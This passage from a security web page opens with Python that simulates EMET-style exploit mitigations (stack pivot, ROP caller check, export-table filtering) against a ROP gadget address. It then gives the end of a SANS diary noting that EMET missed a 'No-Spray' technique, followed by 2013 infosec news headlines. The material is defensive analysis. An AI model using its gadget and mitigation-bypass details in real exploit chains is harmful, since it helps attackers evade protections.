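def call_length_before(mem, ret_addr):
    """Length of a CALL encoding ending exactly at ret_addr, or 0. Only three common
    32-bit forms are modelled here (an assumption of this example):
    E8 rel32 (5 bytes), FF 15 disp32 (6 bytes), FF D0..D7 = CALL reg (2 bytes)."""
    if mem.get(ret_addr - 5) == 0xE8:
        return 5
    if mem.get(ret_addr - 6) == 0xFF and mem.get(ret_addr - 5) == 0x15:
        return 6
    modrm = mem.get(ret_addr - 1)
    if mem.get(ret_addr - 2) == 0xFF and modrm is not None and 0xD0 <= modrm <= 0xD7:
        return 2
    return 0


def caller_check_passes(mem, ret_addr):
    return call_length_before(mem, ret_addr) > 0


# --- EAF: a read that touches an export address table is allowed only when the
#     instruction doing the read sits inside a loaded module image; shellcode on the
#     heap or stack walking kernel32's exports is blocked. ---
def eaf_violation(read_addr, reader_eip, eat_regions, module_regions):
    if not any(r.contains(read_addr) for r in eat_regions):
        return False
    return not any(m.contains(reader_eip) for m in module_regions)


# Constructed layout (not real Windows XP addresses except the gadget address quoted above).
THREAD_STACK = Region("thread stack", 0x0012C000, 0x00130000)
HEAP = Region("heap", 0x00350000, 0x00360000)
KERNEL32 = Region("kernel32.dll", 0x7C800000, 0x7C8F6000)
KERNEL32_EAT = Region("kernel32.dll export table", 0x7C802620, 0x7C803000)
GADGET_PUSH_ESP_RET = 0x77c35459  # 'push esp # ret' entry from the chain in Figure 2


def build_memory():
    """Tiny constructed byte map: a legitimate CALL site and the gadget's surroundings."""
    mem = {}
    # 0x00401000: E8 00 10 00 00 (CALL rel32), 90, 90 -> return address 0x00401005
    for i, b in enumerate(bytes.fromhex("e8001000009090")):
        mem[0x00401000 + i] = b
    # bytes before the gadget are an ordinary epilogue, not a CALL; gadget itself is 54 C3
    for i, b in enumerate(bytes.fromhex("8b45085dc354c3")):
        mem[GADGET_PUSH_ESP_RET - 5 + i] = b
    return mem


def run_scenario(disabled=()):
    """Replay the post: return the first mitigation that stops the attack, or None."""
    mem = build_memory()
    checks = [
        ("StackPivot", lambda: stack_pivot_detected(
            HEAP.start + 0x20, THREAD_STACK.start, THREAD_STACK.end)),
        ("Caller", lambda: not caller_check_passes(mem, GADGET_PUSH_ESP_RET)),
        ("EAF", lambda: eaf_violation(
            KERNEL32_EAT.start + 0x10, HEAP.start + 0x104, [KERNEL32_EAT], [KERNEL32])),
    ]
    for name, fires in checks:
        if name not in disabled and fires():
            return name
    return None


if __name__ == "__main__":
    print(run_scenario())
    print(run_scenario(disabled={"StackPivot"}))
    print(run_scenario(disabled={"StackPivot", "Caller"}))
```

The point of modelling them side by side is the layering: disabling one check only moves the failure to the next stage, which is exactly what the figures above show, and the legitimate CALL site and in-module export read in the tests pass every check, which is why these mitigations can stay on for ordinary code.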
 
So at this point, I'm pretty happy. EMET has kept me honest against Deep Panda and their threat towards nuclear scientists. What I said four months earlier, that EMET 3.5 protects against novel attacks, held very true four months after I said it. But there is a small caveat. Remember that No-Spray method I mentioned? EMET 3.5 failed to detect it in use. In fact, repeating the exercise with EMET 4v Beta also missed the No-Spray. Feature request, Microsoft?

 

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

You're Being Hacked
Daily Beast
Around the time he became the Jester, he told the website Infosec Island, “I do wrestle with whether what I am doing is right.” In his 2012 chat with University of Southern Maine students, he acknowledged that he violates “the same laws the bad guys do.

 

The Network and Malware, Part Deux
Dark Reading
We like joining forces on occasion, even though we're nominally competitors – and it's not just because in the infosec pop charts, analysts rank right down there with Big 4 auditors and the SEC. Think of it either as collusion to take over the industry ...

 

Blended security threats require a unified response
ComputerWeekly.com (blog)
In a recent survey released during Infosec Europe 2013, 93% of large organisations reported that they had been breached in the past year, as did 87% of small organisations. And the report also shows that they are being breached more often with every ...

 
 
Just like on Twitter, Facebook is now putting a small, blue check mark next to the names of celebrities and other high-profile people and businesses on the site to signify their authenticity.
 
Google is kicking off its latest effort to help Gmail users manage their messages -- a redesigned inbox.
 
Despite the growing threat of state-sponsored cyberattacks launched from China and other countries, U.S companies should not be allowed fight back on their own, security experts say.
 
The long-running war between Google and Microsoft may never have a winner, an analyst said today, but it definitely has a loser: customers.
 
Apple CEO Tim Cook spent more than an hour answering questions at the AllThingsD conference yesterday, but said little that was newsworthy
 
Hewlett-Packard has updated a number of its software packages and services to help developers and IT managers modernize their applications so they will better fit into today's always connected environment.
 
The weather is good for more than just small talk, says Maryfran Johnson. It's a big business, with companies like The Weather Channel and AccuWeather selling data analytics to businesses like DHL and Sears, who use weather data to make timely decisions.
 
At Energy Future Holdings, CEO John Young emphasizes the human factors behind IT, supports standardization and expects the CIO to work with business partners.
 
Nissan and some other big brands have suspended advertising campaigns on Facebook after ads were apparently displayed next to offensive content on the site.
 
Dish Network has boosted its bid for Clearwire to US$4.40 per share, 29 percent above Sprint Nextel's most recent offer, and said it is prepared to buy up the stock of a minority of shareholders.
 

Posted by InfoSec News on May 29

http://www.rollingstone.com/politics/news/jeremy-hammond-pleads-guilty-to-stratfor-hack-20130528

By JOHN KNEFEL
Rolling Stone
MAY 28, 2013

Jeremy Hammond pleaded guilty today to the infamous Stratfor hack, as
well as taking responsibility for eight additional hacks of law
enforcement and defense contractor websites in 2011 and 2012. As a
condition of the plea, the radical hacker will face a maximum of 10
years in federal prison, and...
 

Posted by InfoSec News on May 29

http://www.chicagotribune.com/news/local/suburbs/park_ridge_niles/chi-niles-wilmette-skimming-device-20130528,0,1994190.story

By Brian L. Cox
Chicago Tribune
May 28, 2013

Authorities have charged a Niles man in connection with an "ATM
skimming" investigation at a Chase bank in Wilmette, and are working
with agents from the U.S. Secret Service to determine the scope of the
alleged criminal enterprise, officials said today.

Miroslav...
 

Posted by InfoSec News on May 28

http://www.washingtonpost.com/world/national-security/confidential-report-lists-us-weapons-system-designs-compromised-by-chinese-cyberspies/2013/05/27/a42c3e1c-c2dd-11e2-8c3b-0b5e9247e8ca_story.html

By Ellen Nakashima
The Washington Post
May 27, 2013

Designs for many of the nation’s most sensitive advanced weapons systems
have been compromised by Chinese hackers, according to a report prepared
for the Pentagon and to officials from...
 

Posted by InfoSec News on May 28

Forwarded from: Richard Forno <rforno (at) infowarrior.org>

I gather we've got the whole who's-attacking-us cyber-attribution thing
all figured out with absolute unmistakable 100% certainty? I had no
idea. Awesome!

If not, who's going to hold a US company liable for "collateral damage"
in accidentally or mistakenly hacking/crashing some innocent person's
computer/server? Who gets held responsible for...
 

Posted by InfoSec News on May 28

http://www.news.com.au/technology/hacking-chinese-spies-steal-asio-blueprints/story-e6frfro0-1226651694269

By MILES GODFREY
AAP
May 27, 2013

SECRET and highly sensitive blueprints outlining the layout of
Australia's top spy agency's new headquarters have been stolen by
Chinese hackers, the ABC says.

The documents contained details of the ASIO building's floor plans,
communication cabling layouts, server locations and security...
 

Posted by InfoSec News on May 28

http://articles.economictimes.indiatimes.com/2013-05-27/news/39557244_1_security-software-cyber-security-software-names

By J Srikant
ET Bureau
May 27, 2013

The country's top security agencies are not happy that they have to rely
on foreign-made security software from the likes of Symantec and McAfee
to protect India's critical information technology infrastructure.

The call to move away from popular commercial anti-virus and...
 

Posted by InfoSec News on May 28

http://www.taipeitimes.com/News/front/archives/2013/05/25/2003563107

By Shih Hsiu-chuan and Chris Wang
Taipei Times Staff reporters
May 25, 2013

The government experienced a cyberattack on the electronic interchange
system for official documents early this month, but no confidential
information was stolen, an Executive Yuan official confirmed yesterday
following local media reports.

While keeping mum on its findings in tracing the hacking,...
 

Posted by InfoSec News on May 29

http://www.wired.com/dangerroom/2013/05/pentagon-cyberwar-angry-birds/

By Noah Shachtman
Danger Room
Wired.com
05.28.13

The target computer is picked. The order to strike has been given. All
it takes is a finger swipe and a few taps of the touchscreen, and the
cyberattack is prepped to begin.

For the last year, the Pentagon’s top technologists have been working on
a program that will make cyberwarfare relatively easy. It’s called Plan...
 

Posted by InfoSec News on May 29

http://arstechnica.com/security/2013/05/how-crackers-make-minced-meat-out-of-your-passwords/

By Dan Goodin
Ars Technica
May 27, 2013

In March, readers followed along as Nate Anderson, Ars deputy editor and
a self-admitted newbie to password cracking, downloaded a list of more
than 16,000 cryptographically hashed passcodes. Within a few hours, he
deciphered almost half of them. The moral of the story: if a reporter
with zero training in the...
 

Posted by InfoSec News on May 29

http://www.thesmokinggun.com/buster/guccifer-hacks-obama-intelligence-official-567983

The Smoking Gun
MAY 28, 2013

After detours targeting “Sex and the City” author Candace Bushnell and
journalist Carl Bernstein, the hacker “Guccifer” has returned to his
bread and butter criminality, breaking into the e-mail account of an
Obama administration official who heads the National Intelligence
Council.

The breach of Christopher Kojm’s...
 